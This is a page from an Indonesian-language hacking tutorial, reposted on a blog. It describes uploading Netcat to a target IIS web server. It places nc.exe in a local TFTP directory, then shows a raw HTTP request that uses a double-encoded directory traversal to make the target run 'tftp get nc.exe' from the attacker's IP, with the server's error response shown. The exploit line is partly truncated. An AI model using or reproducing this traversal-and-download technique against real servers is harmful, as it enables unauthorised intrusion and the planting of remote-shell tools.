Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
7
Kemudian masukkan program Netcat yang akan Anda upload ke server web target ke dalam
direktori tftp dari komputer Anda yang telah diinstall tftp. Atau Anda dapat mengarahkan base
directory dari tftp ke direktori program Netcat Anda.
OK, sampai disini Anda telah menyiapkan tftp di komputer Anda yang di dalam base
directorinya berisi Netcat. Selanjutnya kita tak akan membahas lebih detail soal tftpd32, karena
kita akan memfokuskan pada pemanfaatan Netcat.
Langkah selanjutnya untuk mengupload Netcat ke server tujuan menggunakan instruksi Netcat,
sebagai berikut:
C:\TMP\NETCAT> nc -v ristbook 80
ristbook [128.1.71.103] 80 (http) open
get http://ristbook/scripts/..%255c../wi…tp+-i+128.1.99
.25+get+nc.exe
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 26 Oct 2003 11:00:54 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application





Copyright © 2012 Smart Note. All rights reserved.

Super SEO created by Blogger Tuts | Published by GalleryBloggerTemplates.com